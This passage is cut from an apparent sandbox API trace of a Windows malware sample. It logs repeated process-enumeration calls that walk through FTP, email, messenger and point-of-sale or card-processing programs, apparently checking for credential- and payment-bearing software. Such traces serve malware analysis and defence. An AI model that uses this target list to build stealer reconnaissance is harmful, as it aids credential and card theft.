(in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0157.593] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0157.595] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0157.596] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0157.598] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0157.600] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0157.602] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0157.604] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0157.606] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0157.607] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0157.610] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0157.611] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0157.613] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0157.637] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0157.640] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0157.641] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0157.643] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0157.645] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0157.647] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x740, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0157.649] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0157.651] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0157.653] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x918, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0157.655] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0157.657] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0157.658] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0157.661] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0157.662] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0157.666] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0157.668] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xacc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0157.669] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0157.671] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0157.673] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0157.675] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0157.676] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xaf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0157.684] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0157.686] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0157.687] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0157.689] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0157.691] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0157.692] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0157.694] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0157.696] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="through recognize.exe")) returned 1 [0157.697] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.699] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0157.700] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0157.702] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xeb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="AppLaunch.exe")) returned 1 [0157.703] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xea0, pcPriClassBase=6, dwFlags=0x0, szExeFile="cdieedr")) returned 1 [0157.705] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xea0, pcPriClassBase=6, dwFlags=0x0, szExeFile="cdieedr")) returned 0 [0157.706] CloseHandle (hObject=0x1518) returned 1 [0157.706] Sleep (dwMilliseconds=0x64) [0157.807] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1518 [0157.816] Process32First (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.817] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0157.819] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0157.821] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.823] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0157.824] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0157.826] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0157.827] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0157.829] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0157.831] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0157.833] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.835] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.837] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.838] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.840] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.841] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.843] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0157.844] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0157.845] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.847] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0157.848] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0157.882] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.885] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0157.887] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0157.889] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0157.891] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0157.893] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0157.895] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.898] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x804, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0157.900] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="sufferexistrich.exe")) returned 1 [0157.902] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="have return physical.exe")) returned 1 [0157.903] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or level.exe")) returned 1 [0157.905] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="court camera.exe")) returned 1 [0157.906] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="or-finger.exe")) returned 1 [0157.908] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel imagine recently.exe")) returned 1 [0157.910] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="school_for.exe")) returned 1 [0157.911] Process32Next (in: hSnapshot=0x1518, lppe=0x618fca0 | out: lppe=0x618fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x978, th32DefaultHeapID=0x0, 